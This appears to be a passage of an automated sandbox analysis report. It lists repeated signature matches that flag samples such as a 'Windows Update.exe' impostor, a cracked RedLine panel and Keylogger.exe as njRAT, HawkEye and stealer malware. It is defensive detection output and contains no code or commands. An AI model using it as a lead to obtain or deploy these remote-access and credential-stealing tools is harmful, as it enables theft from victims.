                  Source: WindowsUpdate.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: WindowsUpdate.exe.17.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: security.dll
                  Source: Hpdyv8oO3j.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  Source: 17.2.Windows Update.exe.350b42c.5.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.2.Windows Update.exe.7f20000.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2886bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2886bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ae6bc0.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ae6bc0.2.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 2.2.Keylogger.exe.7bfa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 2.2.Keylogger.exe.7bfa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.2.Keylogger.exe.768208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.0.Windows Update.exe.d48208.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d9fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d9fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.0.Keylogger.exe.768208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.3.Windows Update.exe.6e1b39a.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.3.Windows Update.exe.6e1b39a.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 16.2.RedLine.exe.2a99190.3.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 2.3.Keylogger.exe.eb4e92.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 2.3.Keylogger.exe.eb4e92.0.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 16.2.RedLine.exe.2a99190.3.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 16.2.RedLine.exe.2a99190.3.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 17.0.Windows Update.exe.d9fa72.5.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d9fa72.5.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.0.Windows Update.exe.d48208.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 16.2.RedLine.exe.2aa6b58.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 16.2.RedLine.exe.2aa6b58.2.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.0.Windows Update.exe.d48208.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.2.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d49c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d49c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 5.2.RedLine.MainPanel-cracked.exe.24b0000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 2.0.Keylogger.exe.7bfa72.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 2.0.Keylogger.exe.7bfa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ad9310.4.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 17.2.Windows Update.exe.d49c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.2.Windows Update.exe.d49c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.2.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 2.2.Keylogger.exe.769c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.2.Windows Update.exe.7d50000.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2886cd8.4.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2886cd8.4.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 17.2.Windows Update.exe.d9fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.2.Windows Update.exe.d9fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 5.2.RedLine.MainPanel-cracked.exe.2879310.2.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 16.2.RedLine.exe.2700000.1.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2630000.1.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 2.0.Keylogger.exe.760000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ae6cd8.3.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 4.2.RedLine.MainPanel-cracked.exe.2ae6cd8.3.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 17.0.Windows Update.exe.d48208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 2.2.Keylogger.exe.2f3be9c.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 16.2.RedLine.exe.2aa6a40.4.raw.unpack, type: UNPACKEDPEMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
                  Source: 16.2.RedLine.exe.2aa6a40.4.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
                  Source: 17.0.Windows Update.exe.d49c0d.15.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d49c0d.15.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 17.0.Windows Update.exe.d9fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 17.0.Windows Update.exe.d9fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 16.2.RedLine.exe.2700000.1.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
